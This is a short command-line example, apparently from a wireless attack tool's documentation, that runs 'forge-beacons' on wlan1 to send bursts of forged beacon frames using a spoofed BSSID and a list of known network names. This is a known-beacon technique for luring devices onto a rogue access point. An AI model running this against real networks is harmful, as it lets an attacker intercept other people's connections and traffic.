# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5